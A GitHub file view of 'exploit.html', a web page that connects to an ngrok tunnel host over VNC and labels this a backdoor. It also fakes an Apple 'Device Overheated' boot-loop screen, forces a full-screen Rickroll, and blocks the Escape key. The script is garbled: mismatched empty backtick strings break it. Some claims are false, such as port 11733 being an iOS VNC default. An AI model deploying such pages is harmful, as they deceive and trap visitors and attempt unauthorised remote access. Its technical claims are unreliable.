-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.html
148 lines (128 loc) · 5.52 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Exploit</title>
<style>
/* Boot loop simulation CSS */
body {
overflow: hidden;
margin: 0;
padding: 0;
}
.boot-loop-container {
display: flex;
align-items: center;
justify-content: center;
height: 100vh;
background-color: #000;
position: relative;
}
.spinner {
width: 20px;
height: 20px;
border: 2px solid #f3f3f3;
border-radius: 50%;
border-top: 2px solid #7f8c8d;
animation: spin 1.5s linear infinite;
position: absolute;
top: calc(50% + 65px);
left: calc(50% - 10px);
}
.overheat-banner {
width: 100%;
text-align: center;
position: absolute;
top: calc(50% - 40px);
color: red;
font-size: 24px;
border: 2px solid red;
padding: 10px;
border-radius: 10px;
}
.apple-logo {
width: 300px;
height: 300px;
background: url('');
background-size: contain;
position: absolute;
top: calc(50% - 150px);
left: calc(50% - 150px);
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
</style>
<script src="https://cdn.jsdelivr.net/gh/kanishksh4rma/[email protected]/vnc.min.js"></script>
<script>
// exploit_payload.js
// Remote access payload
var remoteAccessPayload = ``
// Code for remote access (backdoor)
// Establish VNC connection
function establishVNCConnection() {
var host = 'tcp://5.tcp.eu.ngrok.io';
var port = '11733'; // Default VNC port for iOS devices
// Connect to VNC server
var rfb = new RFB(document.createElement('div'), 'wss://' + host + ':' + port, {});
rfb.scaleViewport = true;
rfb.viewOnly = false;
rfb.focusOnClick = true;
rfb.connect();
}
establishVNCConnection();
``;
// Exploit code to simulate boot loop and play rickroll
var exploitCode = ``
// Function to display boot loop warning
function displayBootLoop() {
var bootLoopContainer = document.createElement('div');
bootLoopContainer.classList.add('boot-loop-container');
var overheatBanner = document.createElement('div');
overheatBanner.classList.add('overheat-banner');
overheatBanner.innerText = 'Device Overheated! Enabling CPU Cooling Measures...';
bootLoopContainer.appendChild(overheatBanner);
var appleLogo = document.createElement('div');
appleLogo.classList.add('apple-logo');
bootLoopContainer.appendChild(appleLogo);
var spinner = document.createElement('div');
spinner.classList.add('spinner');
bootLoopContainer.appendChild(spinner);
document.body.appendChild(bootLoopContainer);
}
// Display the boot loop warning
displayBootLoop();
// Function to play Rickroll video in full-screen mode
function playRickrollInFullScreen() {
var videoElement = document.createElement('iframe');
videoElement.setAttribute('src', 'https://www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1');
videoElement.setAttribute('allow', 'accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture');
videoElement.setAttribute('allowfullscreen', '');
videoElement.setAttribute('style', 'position: fixed; top: 0; left: 0; width: 100%; height: 100%; border: none; z-index: 999999;');
document.body.appendChild(videoElement);
// Prevent the user from exiting full-screen mode
document.addEventListener('keydown', function (event) {
if (event.key === 'Escape' || event.key === 'Esc' || event.keyCode === 27) {
event.preventDefault();
}
}, true);
}
// Play the Rickroll video in full-screen mode
playRickrollInFullScreen();
``;
// Connect to the WebSocket server and send the exploit code
const ws = new WebSocket('ws://localhost:8080');
ws.onopen = function open() {
console.log('connected');
ws.send(exploitCode);
};
ws.onmessage = function incoming(data) {
console.log(data);
};
</script>
</head>
<body>
</body>
</html>